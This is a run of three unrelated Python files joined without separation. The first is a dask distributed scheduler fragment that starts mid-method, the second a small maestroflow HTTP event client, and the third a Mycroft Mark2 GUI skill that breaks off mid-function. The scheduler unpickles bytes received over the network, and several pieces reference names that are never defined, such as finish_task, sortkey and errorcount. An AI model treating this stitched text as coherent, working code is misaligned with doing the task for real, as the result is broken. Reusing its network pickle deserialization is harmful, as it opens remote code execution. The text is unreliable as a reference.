address, header, payload = self.to_clients.recv_multipart()
header = pickle.loads(header)
if 'address' not in header:
header['address'] = address
log(self.address_to_clients, 'Receive job from client', header)
try:
function = self.client_functions[header['function']]
except KeyError:
log(self.address_to_clients, 'Unknown function', header)
else:
self.pool.apply_async(function, args=(header, payload))
def _monitor_workers(self, timeout=20):
""" Event loop: Monitor worker heartbeats """
while self.status != 'closed':
self._monitor_workers_event.wait(timeout)
self.prune_and_notify(timeout=timeout)
self._monitor_workers_event.clear()
def block(self):
""" Block until listener threads close
Warning: If some other thread doesn't call `.close()` then, in the
common case you can not easily escape from this.
"""
self._monitor_workers_thread.join()
self._listen_to_workers_thread.join()
self._listen_to_clients_thread.join()
def _client_registration(self, header, payload):
""" Client comes in, register it, send back info about the cluster"""
payload = pickle.loads(payload)
address = header['address']
self.clients[address] = payload
out_header = {}
out_payload = {'workers': self.workers}
self.send_to_client(header['address'], out_header, out_payload)
def _worker_finished_task(self, header, payload):
""" Worker reports back as having finished task, ready for more
See also:
Scheduler.trigger_task
Scheduler.schedule
"""
with logerrors():
address = header['address']
payload = pickle.loads(payload)
key = payload['key']
duration = payload['duration']
dependencies = payload['dependencies']
log(self.address_to_workers, 'Finish task', payload)
for dep in dependencies:
self.who_has[dep].add(address)
self.worker_has[address].add(dep)
self.available_workers.put(address)
if isinstance(payload['status'], Exception):
self.queues[payload['queue']].put(payload)
else:
self.data[key]['duration'] = duration
self.who_has[key].add(address)
self.worker_has[address].add(key)
self.queues[payload['queue']].put(payload)
def _status_to_client(self, header, payload):
with logerrors():
out_header = {'jobid': header.get('jobid')}
log(self.address_to_clients, 'Status')
self.send_to_client(header['address'], out_header, 'OK')
def _status_to_worker(self, header, payload):
out_header = {'jobid': header.get('jobid')}
log(self.address_to_workers, 'Status sending')
self.send_to_worker(header['address'], out_header, 'OK')
def send_to_worker(self, address, header, payload):
""" Send packet to worker """
log(self.address_to_workers, 'Send to worker', address, header)
header['address'] = self.address_to_workers
loads = header.get('loads', pickle.loads)
dumps = header.get('dumps', pickle.dumps)
if isinstance(address, unicode):
address = address.encode()
header['timestamp'] = datetime.utcnow()
self.send_to_workers_queue.put([address,
pickle.dumps(header),
dumps(payload)])
self.send_to_workers_send.send(b'')
def send_to_client(self, address, header, result):
""" Send packet to client """
log(self.address_to_clients, 'Send to client', address, header)
header['address'] = self.address_to_clients
loads = header.get('loads', pickle.loads)
dumps = header.get('dumps', pickle.dumps)
if isinstance(address, unicode):
address = address.encode()
header['timestamp'] = datetime.utcnow()
with self.lock:
self.to_clients.send_multipart([address,
pickle.dumps(header),
dumps(result)])
def trigger_task(self, dsk, key, queue):
""" Send a single task to the next available worker
See also:
Scheduler.schedule
Scheduler.worker_finished_task
"""
deps = get_dependencies(dsk, key)
worker = self.available_workers.get()
locations = dict((dep, self.who_has[dep]) for dep in deps)
header = {'function': 'compute', 'jobid': key,
'dumps': dill.dumps, 'loads': dill.loads}
payload = {'key': key, 'task': dsk[key], 'locations': locations,
'queue': queue}
self.send_to_worker(worker, header, payload)
def release_key(self, key):
""" Release data from all workers
Example
-------
>>> scheduler.release_key('x') # doctest: +SKIP
Protocol
--------
This sends a 'delitem' request to all workers known to have this key.
This operation is fire-and-forget. Local indices will be updated
immediately.
"""
with logerrors():
workers = list(self.who_has[key])
log(self.address_to_workers, 'Release data', key, workers)
header = {'function': 'delitem', 'jobid': key}
payload = {'key': key}
for worker in workers:
self.send_to_worker(worker, header, payload)
self.who_has[key].remove(worker)
self.worker_has[worker].remove(key)
def send_data(self, key, value, address=None, reply=True):
""" Send data up to some worker
If no address is given we select one worker randomly
Example
-------
>>> scheduler.send_data('x', 10) # doctest: +SKIP
>>> scheduler.send_data('x', 10, 'tcp://bob:5000', reply=False) # doctest: +SKIP
Protocol
--------
1. Scheduler makes a queue
2. Scheduler selects a worker at random (or uses prespecified worker)
3. Scheduler sends 'setitem' operation to that worker
{'key': ..., 'value': ..., 'queue': ...}
4. Worker gets data and stores locally, send 'setitem-ack'
{'key': ..., 'queue': ...}
5. Scheduler gets from queue, send_data cleans up queue and returns
See also:
Scheduler.setitem_ack
Worker.setitem
Scheduler.scatter
"""
if reply:
queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = queue
else:
qkey = None
if address is None:
address = random.choice(list(self.workers))
header = {'function': 'setitem', 'jobid': key}
payload = {'key': key, 'value': value, 'queue': qkey}
self.send_to_worker(address, header, payload)
if reply:
queue.get()
del self.queues[qkey]
def scatter(self, key_value_pairs, block=True):
""" Scatter data to workers
Parameters
----------
key_value_pairs: Iterator or dict
Data to send
block: bool
Block on completion or return immediately (defaults to True)
Example
-------
>>> scheduler.scatter({'x': 1, 'y': 2}) # doctest: +SKIP
Protocol
--------
1. Scheduler starts up a uniquely identified queue.
2. Scheduler sends 'setitem' requests to workers with
{'key': ..., 'value': ... 'queue': ...}
3. Scheduler waits on queue for all responses
4. Workers receive 'setitem' requests, send back on 'setitem-ack' with
{'key': ..., 'queue': ...}
5. Scheduler's 'setitem-ack' function pushes keys into the queue
6. Once the same number of replies is heard scheduler scatter function
returns
7. Scheduler cleans up queue
See Also:
Scheduler.setitem_ack
Worker.setitem_scheduler
"""
workers = list(self.workers)
log(self.address_to_workers, 'Scatter', workers, key_value_pairs)
workers = itertools.cycle(workers)
if isinstance(key_value_pairs, dict):
key_value_pairs = key_value_pairs.items()
queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = queue
counter = 0
for (k, v), w in zip(key_value_pairs, workers):
header = {'function': 'setitem', 'jobid': k}
payload = {'key': k, 'value': v}
if block:
payload['queue'] = qkey
self.send_to_worker(w, header, payload)
counter += 1
if block:
for i in range(counter):
queue.get()
del self.queues[qkey]
def gather(self, keys):
""" Gather data from workers
Parameters
----------
keys: key, list of keys, nested list of lists of keys
Keys to collect from workers
Example
-------
>>> scheduler.gather('x') # doctest: +SKIP
>>> scheduler.gather([['x', 'y'], ['z']]) # doctest: +SKIP
Protocol
--------
1. Scheduler starts up a uniquely identified queue.
2. Scheduler sends 'getitem' requests to workers with payloads
{'key': ..., 'queue': ...}
        3. Scheduler waits on queue for all responses
        4. Workers receive 'getitem' requests, send data back on 'getitem-ack'
           {'key': ..., 'value': ..., 'queue': ...}
        5. Scheduler's 'getitem-ack' function pushes key/value pairs onto queue
        6. Once the same number of replies is heard the gather function
           collects data into form specified by keys input and returns
        7. Scheduler cleans up queue before returning
See Also:
Scheduler.getitem_ack
Worker.getitem_scheduler
"""
qkey = str(uuid.uuid1())
queue = Queue()
self.queues[qkey] = queue
        # Send off the requests
self._gather_send(qkey, keys)
# Wait for replies
cache = dict()
for i in flatten(keys):
k, v = queue.get()
cache[k] = v
del self.queues[qkey]
# Reshape to keys
return core.get(cache, keys)
def _gather_send(self, qkey, key):
if isinstance(key, list):
for k in key:
self._gather_send(qkey, k)
else:
header = {'function': 'getitem', 'jobid': key}
payload = {'key': key, 'queue': qkey}
seq = list(self.who_has[key])
worker = random.choice(seq)
self.send_to_worker(worker, header, payload)
def _getitem_ack(self, header, payload):
""" Receive acknowledgement from worker about a getitem request
See also:
Scheduler.gather
Worker.getitem
"""
payload = pickle.loads(payload)
log(self.address_to_workers, 'Getitem ack', payload['key'],
payload['queue'])
with logerrors():
assert header['status'] == 'OK'
self.queues[payload['queue']].put((payload['key'],
payload['value']))
def _setitem_ack(self, header, payload):
""" Receive acknowledgement from worker about a setitem request
See also:
Scheduler.scatter
Worker.setitem
"""
address = header['address']
payload = pickle.loads(payload)
key = payload['key']
self.who_has[key].add(address)
self.worker_has[address].add(key)
queue = payload.get('queue')
if queue:
self.queues[queue].put(key)
def close_workers(self):
header = {'function': 'close'}
while self.workers != {}:
w, v = self.workers.popitem()
self.send_to_worker(w, header, {})
self.send_to_workers_queue.join()
def _close(self, header, payload):
self.close()
def close(self):
""" Close Scheduler """
self.close_workers()
self.status = 'closed'
self._monitor_workers_event.set()
self.to_workers.close(linger=1)
self.to_clients.close(linger=1)
self.send_to_workers_send.close(linger=1)
self.send_to_workers_recv.close(linger=1)
self.pool.close()
self.pool.join()
self.block()
self.context.destroy(linger=3)
def schedule(self, dsk, result, **kwargs):
""" Execute dask graph against workers
Parameters
----------
dsk: dict
Dask graph
result: list
keys to return (possibly nested)
Example
-------
>>> scheduler.get({'x': 1, 'y': (add, 'x', 2)}, 'y') # doctest: +SKIP
3
Protocol
--------
1. Scheduler scatters precomputed data in graph to workers
e.g. nodes like ``{'x': 1}``. See Scheduler.scatter
        2. Scheduler repeatedly fires ready tasks at available workers
           (Scheduler.trigger_task) and, as 'finished-task' events come back,
           releases intermediate data and fires newly ready tasks.
        3. When every task has run, results are gathered from the workers
           (Scheduler.gather) and the result keys are released.
"""
with self._schedule_lock:
log(self.address_to_workers, "Scheduling dask")
if isinstance(result, list):
result_flat = set(flatten(result))
else:
result_flat = set([result])
results = set(result_flat)
cache = dict()
dag_state = dag_state_from_dask(dsk, cache=cache)
if cache:
self.scatter(cache.items()) # send data in dask up to workers
tick = [0]
if dag_state['waiting'] and not dag_state['ready']:
raise ValueError("Found no accessible jobs in dask graph")
event_queue = Queue()
qkey = str(uuid.uuid1())
self.queues[qkey] = event_queue
def fire_task():
tick[0] += 1 # Update heartbeat
# Choose a good task to compute
key = dag_state['ready'].pop()
dag_state['ready-set'].remove(key)
dag_state['running'].add(key)
self.trigger_task(dsk, key, qkey) # Fire
try:
worker = self.available_workers.get(timeout=20)
self.available_workers.put(worker) # put him back in
except Empty:
raise ValueError("Waited 20 seconds. No workers found")
# Seed initial tasks
while dag_state['ready'] and self.available_workers.qsize() > 0:
fire_task()
# Main loop, wait on tasks to finish, insert new ones
while dag_state['waiting'] or dag_state['ready'] or dag_state['running']:
payload = event_queue.get()
if isinstance(payload['status'], Exception):
raise payload['status']
key = payload['key']
finish_task(dsk, key, dag_state, results, sortkey,
release_data=self._release_data)
while dag_state['ready'] and self.available_workers.qsize() > 0:
fire_task()
result2 = self.gather(result)
for key in flatten(result): # release result data from workers
self.release_key(key)
return result2
def _schedule_from_client(self, header, payload):
"""
Input Payload: keys, dask
Output Payload: keys, result
Sent to client on 'schedule-ack'
"""
with logerrors():
loads = header.get('loads', dill.loads)
payload = loads(payload)
address = header['address']
dsk = payload['dask']
keys = payload['keys']
header2 = {'jobid': header.get('jobid'),
'function': 'schedule-ack'}
try:
result = self.schedule(dsk, keys)
header2['status'] = 'OK'
except Exception as e:
result = e
header2['status'] = 'Error'
payload2 = {'keys': keys, 'result': result}
self.send_to_client(address, header2, payload2)
def _release_data(self, key, state, delete=True):
""" Remove data from temporary storage during scheduling run
See Also
Scheduler.schedule
dask.async.finish_task
"""
if key in state['waiting_data']:
assert not state['waiting_data'][key]
del state['waiting_data'][key]
state['released'].add(key)
if delete:
self.release_key(key)
def _set_collection(self, header, payload):
with logerrors():
log(self.address_to_clients, "Set collection", header)
payload = header.get('loads', dill.loads)(payload)
self.collections[payload['name']] = payload
self.send_to_client(header['address'], {'status': 'OK'}, {})
def _get_collection(self, header, payload):
with logerrors():
log(self.address_to_clients, "Get collection", header)
payload = header.get('loads', pickle.loads)(payload)
payload2 = self.collections[payload['name']]
header2 = {'status': 'OK',
'loads': dill.loads,
'dumps': dill.dumps}
self.send_to_client(header['address'], header2, payload2)
def _get_workers(self, header, payload):
with logerrors():
log(self.address_to_clients, "Get workers", header)
self.send_to_client(header['address'],
{'status': 'OK'},
{'workers': self.workers})
def _heartbeat(self, header, payload):
with logerrors():
log(self.address_to_clients, "Heartbeat", header)
payload = pickle.loads(payload)
address = header['address']
if address not in self.workers:
self.available_workers.put(address)
self.workers[address] = payload
self.workers[address]['last-seen'] = datetime.utcnow()
def prune_workers(self, timeout=20):
"""
Remove workers from scheduler that have not sent a heartbeat in
`timeout` seconds.
"""
now = datetime.utcnow()
remove = []
for worker, data in self.workers.items():
if abs(data['last-seen'] - now).microseconds > (timeout * 1e6):
remove.append(worker)
[self.workers.pop(r) for r in remove]
return remove
def prune_and_notify(self, timeout=20):
removed = self.prune_workers(timeout=timeout)
if removed != []:
for w_address in self.workers:
header = {'function': 'worker-death'}
payload = {'removed': removed}
self.send_to_worker(w_address, header, payload)
maestroflow.py
import requests
from aiohttp import web
import threading
import queue
import asyncio
import time
import signal
import sys
import os
import base64
import socket
def get_open_port():
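# Bind to port 0 so the OS assigns a free ephemeral port, read the number back, then release the socket.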
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("",0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
def image(png_filename):
with open(png_filename, "rb") as image_file:
encoded_string = base64.b64encode(image_file.read())
return encoded_string.decode('utf-8')
def server(host, port, loop_queue, result_queue):
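# Thread target: runs an aiohttp app on a fresh event loop, hands that loop back through
# loop_queue so the owner can stop it later, and pushes every GET/POST to '/' onto result_queue.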
loop = asyncio.new_event_loop()
loop_queue.put(loop)
asyncio.set_event_loop(loop)
async def receive(request):
result_queue.put(request)
return web.Response(text="ok")
app = web.Application()
app.add_routes([web.get('/', receive)])
app.add_routes([web.post('/', receive)])
web.run_app(app, host=host, port=port)
class Application:
def __init__(self, name, logo, host="127.0.0.1", port=None, maestroflow_addr="http://127.0.0.1:54921/"):
if port is None:
port = get_open_port()
self.port = port
self.name = name
self.logo = logo
self.host = host
self.http_addr = "http://" + self.host + ":" + str(self.port)
self.maestroflow_addr = maestroflow_addr
self.sources = []
self.sinks = {}
self.send({'commType': 'ApplicationAnnouncement', 'name': name, 'logo': logo})
self.recieve_queue = queue.Queue()
loop_queue = queue.Queue()
self.server_thread = threading.Thread(target=server, args=(host, port, loop_queue, self.recieve_queue))
self.server_thread.start()
self.loop = loop_queue.get()
def add_source(self, source):
self.sources.append(source)
def add_sink(self, sink):
self.sinks[sink.path] = sink
def send(self, data):
data['application'] = self.name
data['addr'] = self.http_addr
requests.post(self.maestroflow_addr, data=data)
def poll(self):
while not self.recieve_queue.empty():
query = self.recieve_queue.get().query
if 'commType' in query and 'application' in query and 'path' in query and 'typeName' in query and 'data' in query:
comm_type = query['commType']
application = query['application']
path = query['path']
if comm_type == 'EventAnnouncement' and application == self.name and path in self.sinks:
type_name = query['typeName']
data = query['data']
sink = self.sinks[path]
event = Event(application, path, type_name, data)
sink.notify(event)
def stop(self):
self.loop.stop()
# The server will not actually process the stop immediately for some reason. As a hack,
# we send it a bogus message so that it will actually die
requests.post(self.http_addr)
self.server_thread.join()
class Event:
def __init__(self, application, path, type_name, data):
self.application = application
self.path = path
self.type_name = type_name
self.data = data
class Source:
def __init__(self, application, path, type_name):
self.application = application
self.application.add_source(self)
self.path = self.application.name + "." + path
self.type_name = type_name
self.application.send({'commType': 'SourceAnnouncement', 'path': self.path, 'typeName': self.type_name})
def notify(self, data):
self.application.send({'commType': 'EventAnnouncement', 'path': self.path, 'typeName': self.type_name, 'data': data})
#http://127.0.0.1:54921/?type=SinkAnnouncement&application=foobar&path=foobarqux&typeName=color
class Sink:
def __init__(self, application, path, type_name):
self.path = application.name + "." + path
self.application = application
self.application.add_sink(self)
self.type_name = type_name
self.application.send({'commType': 'SinkAnnouncement', 'path': self.path, 'typeName': self.type_name})
self.callbacks = []
def on_notify(self, callback):
self.callbacks.append(callback)
def notify(self, event):
for callback in self.callbacks:
callback(event.data)
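# --- Hypothetical usage sketch (not part of the original module) ---
# A minimal example of wiring one Source and one Sink into an Application. It assumes a
# MaestroFlow hub is listening at the default maestroflow_addr and routes the
# "demo.colour-out" source to the "demo.colour-in" sink; "logo.png" is a placeholder file.
if __name__ == "__main__":
    app = Application("demo", image("logo.png"))
    colour_out = Source(app, "colour-out", "color")
    colour_in = Sink(app, "colour-in", "color")
    colour_in.on_notify(lambda data: print("got colour:", data))
    colour_out.notify("#ff8800")  # announce an event to the hub
    for _ in range(10):           # pump incoming events for a few seconds
        app.poll()
        time.sleep(0.5)
    app.stop()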
__init__.py
# Copyright 2018 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astral
import time
import arrow
from pytz import timezone
from datetime import datetime
from mycroft.messagebus.message import Message
from mycroft.skills.core import MycroftSkill
from mycroft.util import get_ipc_directory
from mycroft.util.log import LOG
from mycroft.util.parse import normalize
from mycroft import intent_file_handler
import os
import subprocess
import pyaudio
from threading import Thread, Lock
from .listener import (get_rms, open_mic_stream, read_file_from,
INPUT_FRAMES_PER_BLOCK)
# Definitions used when sending volume over i2c
VOL_MAX = 30
VOL_OFFSET = 15
VOL_SMAX = VOL_MAX - VOL_OFFSET
VOL_ZERO = 0
def compare_origin(m1, m2):
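# True when both arguments (Message objects or raw origin strings) share the same '__from' origin.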
origin1 = m1.data['__from'] if isinstance(m1, Message) else m1
origin2 = m2.data['__from'] if isinstance(m2, Message) else m2
return origin1 == origin2
def clip(val, minimum, maximum):
""" Clips / limits a value to a specific range.
Arguments:
val: value to be limited
minimum: minimum allowed value
maximum: maximum allowed value
"""
return min(max(val, minimum), maximum)
class Mark2(MycroftSkill):
"""
The Mark2 skill handles much of the gui activities related to
Mycroft's core functionality. This includes showing "listening",
"thinking", and "speaking" faces as well as more complicated things
such as switching to the selected resting face and handling
system signals.
"""
def __init__(self):
super().__init__('Mark2')
self.i2c_channel = 1
self.idle_screens = {}
self.override_idle = None
self.idle_next = 0 # Next time the idle screen should trigger
self.idle_lock = Lock()
self.settings['auto_brightness'] = False
self.settings['use_listening_beep'] = True
self.has_show_page = False # resets with each handler
# Volume indicator
self.thread = None
self.pa = pyaudio.PyAudio()
try:
self.listener_file = os.path.join(get_ipc_directory(), 'mic_level')
self.st_results = os.stat(self.listener_file)
except Exception:
self.listener_file = None
self.st_results = None
self.max_amplitude = 0.001
# System volume
self.volume = 0.5
self.muted = False
self.get_hardware_volume() # read from the device
self.idle_override_set_time = time.monotonic()
def setup_mic_listening(self):
""" Initializes PyAudio, starts an input stream and launches the
listening thread.
"""
listener_conf = self.config_core['listener']
self.stream = open_mic_stream(self.pa,
listener_conf.get('device_index'),
listener_conf.get('device_name'))
self.amplitude = 0
def initialize(self):
""" Perform initalization.
Registers messagebus handlers and sets default gui values.
"""
enclosure_info = self.config_core.get('enclosure', {})
self.i2c_channel = enclosure_info.get('i2c_channel',
self.i2c_channel)
self.brightness_dict = self.translate_namedvalues('brightness.levels')
self.gui['volume'] = 0
# Prepare GUI Viseme structure
self.gui['viseme'] = {'start': 0, 'visemes': []}
# Preselect Time and Date as resting screen
self.gui['selected'] = self.settings.get('selected', 'Time and Date')
self.gui.set_on_gui_changed(self.save_resting_screen)
try:
self.add_event('mycroft.internet.connected',
self.handle_internet_connected)
# Handle the 'waking' visual
self.add_event('recognizer_loop:record_begin',
self.handle_listener_started)
self.add_event('recognizer_loop:record_end',
self.handle_listener_ended)
self.add_event('mycroft.speech.recognition.unknown',
self.handle_failed_stt)
# Handle the 'busy' visual
self.bus.on('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.on('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.on('mycroft.awoken',
self.on_handler_awoken)
self.bus.on('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.on('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.on('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.on('gui.page.show',
self.on_gui_page_show)
self.bus.on('gui.page_interaction', self.on_gui_page_interaction)
self.bus.on('mycroft.skills.initialized', self.reset_face)
self.bus.on('mycroft.mark2.register_idle',
self.on_register_idle)
self.add_event('mycroft.mark2.reset_idle',
self.restore_idle_screen)
# Handle device settings events
self.add_event('mycroft.device.settings',
self.handle_device_settings)
# Use Legacy for QuickSetting delegate
self.gui.register_handler('mycroft.device.settings',
self.handle_device_settings)
self.gui.register_handler('mycroft.device.settings.homescreen',
self.handle_device_homescreen_settings)
self.gui.register_handler('mycroft.device.settings.ssh',
self.handle_device_ssh_settings)
self.gui.register_handler('mycroft.device.settings.reset',
self.handle_device_factory_reset_settings)
self.gui.register_handler('mycroft.device.settings.update',
self.handle_device_update_settings)
self.gui.register_handler('mycroft.device.settings.restart',
self.handle_device_restart_action)
self.gui.register_handler('mycroft.device.settings.poweroff',
self.handle_device_poweroff_action)
self.gui.register_handler('mycroft.device.settings.wireless',
self.handle_show_wifi_screen_intent)
self.gui.register_handler('mycroft.device.show.idle',
self.show_idle_screen)
# Handle idle selection
self.gui.register_handler('mycroft.device.set.idle',
self.set_idle_screen)
# System events
self.add_event('system.reboot', self.handle_system_reboot)
self.add_event('system.shutdown', self.handle_system_shutdown)
# Handle volume setting via I2C
self.add_event('mycroft.volume.set', self.on_volume_set)
self.add_event('mycroft.volume.get', self.on_volume_get)
# Show loading screen while starting up skills.
# self.gui['state'] = 'loading'
# self.gui.show_page('all.qml')
# Collect Idle screens and display if skill is restarted
self.collect_resting_screens()
except Exception:
LOG.exception('In Mark 2 Skill')
# Update use of wake-up beep
self._sync_wake_beep_setting()
self.settings_change_callback = self.on_websettings_changed
def start_listening_thread(self):
# Start listening thread
if not self.thread:
self.running = True
self.thread = Thread(target=self.listen_thread)
self.thread.daemon = True
self.thread.start()
def stop_listening_thread(self):
if self.thread:
self.running = False
self.thread.join()
self.thread = None
###################################################################
# System events
def handle_system_reboot(self, message):
self.speak_dialog('rebooting', wait=True)
subprocess.call(['/usr/bin/systemctl', 'reboot'])
def handle_system_shutdown(self, message):
subprocess.call(['/usr/bin/systemctl', 'poweroff'])
###################################################################
# System volume
def on_volume_set(self, message):
""" Force vol between 0.0 and 1.0. """
vol = message.data.get("percent", 0.5)
vol = clip(vol, 0.0, 1.0)
self.volume = vol
self.muted = False
self.set_hardware_volume(vol)
self.show_volume = True
def on_volume_get(self, message):
""" Handle request for current volume. """
self.bus.emit(message.response(data={'percent': self.volume,
'muted': self.muted}))
def set_hardware_volume(self, pct):
""" Set the volume on hardware (which supports levels 0-63).
Arguments:
pct (float): audio volume (0.0 - 1.0).
"""
vol = int(VOL_SMAX * pct + VOL_OFFSET) if pct >= 0.01 else VOL_ZERO
self.log.debug('Setting hardware volume to: {}'.format(pct))
command = ['i2cset',
'-y', # force a write
str(self.i2c_channel), # i2c bus number
'0x4b', # stereo amp device addr
str(vol)] # volume level, 0-63
self.log.info(' '.join(command))
try:
subprocess.call(command)
except Exception as e:
self.log.error('Couldn\'t set volume. ({})'.format(e))
def get_hardware_volume(self):
# Get the volume from hardware
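# i2cget returns a hex string, e.g. '0x16' -> 22, which maps to (22 - 15) / 15 ≈ 0.47 after clipping to 0-63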
command = ['i2cget', '-y', str(self.i2c_channel), '0x4b']
self.log.info(' '.join(command))
try:
vol = subprocess.check_output(command)
# Convert the returned hex value from i2cget
hw_vol = int(vol, 16)
hw_vol = clip(hw_vol, 0, 63)
self.volume = clip((hw_vol - VOL_OFFSET) / VOL_SMAX, 0.0, 1.0)
except subprocess.CalledProcessError as e:
self.log.info('I2C Communication error: {}'.format(repr(e)))
except FileNotFoundError:
self.log.info('i2cget couldn\'t be found')
except Exception:
self.log.info('UNEXPECTED VOLUME RESULT: {}'.format(vol))
###################################################################
# Idle screen mechanism
def save_resting_screen(self):
""" Handler to be called if the settings are changed by
the GUI.
Stores the selected idle screen.
"""
self.log.debug("Saving resting screen")
self.settings['selected'] = self.gui['selected']
self.gui['selectedScreen'] = self.gui['selected']
def collect_resting_screens(self):
""" Trigger collection and then show the resting screen. """
self.bus.emit(Message('mycroft.mark2.collect_idle'))
time.sleep(1)
self.show_idle_screen()
def on_register_idle(self, message):
""" Handler for catching incoming idle screens. """
if 'name' in message.data and 'id' in message.data:
self.idle_screens[message.data['name']] = message.data['id']
self.log.info('Registered {}'.format(message.data['name']))
else:
self.log.error('Malformed idle screen registration received')
def reset_face(self, message):
""" Triggered after skills are initialized.
Switches from the default resting "face" to a registered resting screen.
"""
time.sleep(1)
self.collect_resting_screens()
def listen_thread(self):
""" listen on mic input until self.running is False. """
self.setup_mic_listening()
self.log.debug("Starting listening")
while self.running:
self.listen()
self.stream.close()
self.log.debug("Listening stopped")
def get_audio_level(self):
""" Get level directly from audio device. """
try:
block = self.stream.read(INPUT_FRAMES_PER_BLOCK)
except IOError as e:
# damn
self.errorcount += 1
self.log.error('{} Error recording: {}'.format(self.errorcount, e))
return None
amplitude = get_rms(block)
result = int(amplitude / ((self.max_amplitude) + 0.001) * 15)
self.max_amplitude = max(amplitude, self.max_amplitude)
return result
def get_listener_level(self):
""" Get level from IPC file created by listener. """
time.sleep(0.05)
if not self.listener_file:
try:
self.listener_file = os.path.join(get_ipc_directory(),
'mic_level')
except FileNotFoundError:
return None
try:
st_results = os.stat(self.listener_file)
if (not st_results.st_ctime == self.st_results.st_ctime or
not st_results.st_mtime == self.st_results.st_mtime):
ret = read_file_from(self.listener_file, 0)
self.st_results = st_results
if ret is not None:
if ret > self.max_amplitude:
self.max_amplitude = ret
ret = int(ret / self.max_amplitude * 10)
return ret
except Exception as e:
self.log.error(repr(e))
return None
def listen(self):
""" Read microphone level and store rms into self.gui['volume']. """
amplitude = self.get_audio_level()
# amplitude = self.get_listener_level()
if (self.gui and
('volume' not in self.gui or self.gui['volume'] != amplitude) and
amplitude is not None):
self.gui['volume'] = amplitude
def restore_idle_screen(self, _=None):
if (self.override_idle and
time.monotonic() - self.override_idle[1] > 2):
self.override_idle = None
self.show_idle_screen()
def stop(self, message=None):
""" Clear override_idle and stop visemes. """
self.log.info('Stop received')
if time.monotonic() > self.idle_override_set_time + 7:
self.restore_idle_screen()
self.gui['viseme'] = {'start': 0, 'visemes': []}
return False
def shutdown(self):
# Gotta clean up manually since not using add_event()
self.bus.remove('mycroft.skill.handler.start',
self.on_handler_started)
self.bus.remove('recognizer_loop:sleep',
self.on_handler_sleep)
self.bus.remove('mycroft.awoken',
self.on_handler_awoken)
self.bus.remove('enclosure.mouth.reset',
self.on_handler_mouth_reset)
self.bus.remove('recognizer_loop:audio_output_end',
self.on_handler_mouth_reset)
self.bus.remove('enclosure.mouth.viseme_list',
self.on_handler_speaking)
self.bus.remove('gui.page.show',
self.on_gui_page_show)
self.bus.remove('gui.page_interaction', self.on_gui_page_interaction)
self.bus.remove('mycroft.mark2.register_idle', self.on_register_idle)
self.stop_listening_thread()
#####################################################################
# Manage "busy" visual
def on_handler_started(self, message):
handler = message.data.get("handler", "")
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
def on_gui_page_interaction(self, message):
""" Reset idle timer to 30 seconds when page is flipped. """
self.log.info("Resetting idle counter to 30 seconds")
self.start_idle_event(30)
def on_gui_page_show(self, message):
if 'mark-2' not in message.data.get('__from', ''):
# Some skill other than the handler is showing a page
self.has_show_page = True
# If a skill overrides the idle do not switch page
override_idle = message.data.get('__idle')
if override_idle is True:
# Disable idle screen
self.idle_override_set_time = time.monotonic()
self.log.info('Cancelling Idle screen')
self.cancel_idle_event()
self.override_idle = (message, time.monotonic())
elif isinstance(override_idle, int) and override_idle is not False:
# Set the indicated idle timeout
self.idle_override_set_time = time.monotonic()
self.log.info('Overriding idle timer to'
' {} seconds'.format(override_idle))
self.start_idle_event(override_idle)
elif (message.data['page'] and
not message.data['page'][0].endswith('idle.qml')):
# Check if the show_page deactivates a previous idle override
# This is only possible if the page is from the same skill
self.log.info('Cancelling idle override')
if (override_idle is False and
compare_origin(message, self.override_idle[0])):
# Remove the idle override page if override is set to false
self.override_idle = None
# Set default idle screen timer
self.start_idle_event(30)
def on_handler_mouth_reset(self, message):
""" Restore viseme to a smile. """
pass
def on_handler_sleep(self, message):
""" Show resting face when going to sleep. """
self.gui['state'] = 'resting'
self.gui.show_page('all.qml')
def on_handler_awoken(self, message):
""" Show awake face when sleep ends. """
self.gui['state'] = 'awake'
self.gui.show_page('all.qml')
def on_handler_complete(self, message):
""" When a skill finishes executing clear the showing page state. """
handler = message.data.get('handler', '')
# Ignoring handlers from this skill and from the background clock
if 'Mark2' in handler:
return
if 'TimeSkill.update_display' in handler:
return
self.has_show_page = False
try:
if self.hourglass_info[handler] == -1:
self.enclosure.reset()
del self.hourglass_info[handler]
except Exception:
# There is a slim chance the self.hourglass_info might not
# be populated if this skill reloads at just the right time
# so that it misses the mycroft.skill.handler.start but
# catches the mycroft.skill.handler.complete
pass
#####################################################################
# Manage "speaking" visual
def on_handler_speaking(self, message):
""" Show the speaking page if no skill has registered a page
to be shown in its place.
"""
self.gui["viseme"] = message.data
if not self.has_show_page:
self.gui['state'] = 'speaking'
self.gui.show_page("all.qml")
# Show idle screen after the visemes are done (+ 5 sec).
time = message.data['visemes'][-1][1] + 5
self.start_idle_event(time)
#####################################################################
# Manage "idle" visual state
def cancel_idle_event(self):
self.idle_next = 0
self.cancel_scheduled_event('IdleCheck')
def start_idle_event(self, offset=60, weak=False):
""" Start an event for showing the idle screen.
Arguments:
offset: How long until the idle screen should be shown
weak: set to True if the timeout may be overridden by later events
"""
with self.idle_lock:
if time.monotonic() + offset < self.idle_next:
self.log.info('No update, before next time')
return
self.log.info('Starting idle event')
try:
if not weak:
self.idle_next = time.monotonic() + offset
# Clear any existing checker
self.cancel_scheduled_event('IdleCheck')
time.sleep(0.5)
self.schedule_event(self.show_idle_screen, int(offset),
name='IdleCheck')
self.log.info('Showing idle screen in '
'{} seconds'.format(offset))
except Exception as e:
self.log.exception(repr(e))
def show_idle_screen(self):
""" Show the idle screen or return to the skill that's overriding idle.
"""
self.log.debug('Showing idle screen')
screen = None
if self.override_idle:
self.log.debug('Returning to override idle screen')
